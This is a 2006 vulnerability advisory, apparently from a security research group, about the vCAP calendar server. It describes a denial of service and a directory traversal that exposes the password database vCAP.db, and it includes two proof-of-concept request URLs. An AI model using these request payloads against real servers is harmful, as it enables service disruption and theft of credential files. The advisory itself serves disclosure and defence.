The vCAP Calendar server versions 1.9.0 Beta and below suffer from denial of service and directory traversal vulnerabilities.
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title: vCAP calendar server Multiple vulnerabilities
Author: securma massine <securma@morx.org>
MorX Security Research Team
http://www.morx.org
Product info : vCAP (www.pscs.co.uk)is a network calendar server for Windows. vCAP allows user to create calendars which can be viewed and modified by people on network using a web browser.
Original Advisory/PoC : http://www.morx.org/vcap.txt
Severity: Medium/High - user can remotely attack the server
Vulnerability Description:
v1: denial of service attack with a specific request
v2: directory traversal , any file on the system can be downloaded ,especially vCAp's passwords (vCAP.db)
Affected Software(s): vCAP calendar server 1.9.0 Beta and prior
Affected platform(s): Windows
Exploit/Proof of Concept:
v1- http://127.0.0.1:6100/StoresAndCalendarsList.cgi?session=%d%d%d%d%d
v2- http://127.0.0.1:6100/../Data/vCAP.db
Solution : ??
History:
16/08/2006 initial vendor contact
17/08/2006 sending vulnerability details
31/08/2006 vulnerability confirmed
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose only.The author do not have any responsibility for any malicious use of this advisory or proof of concept code.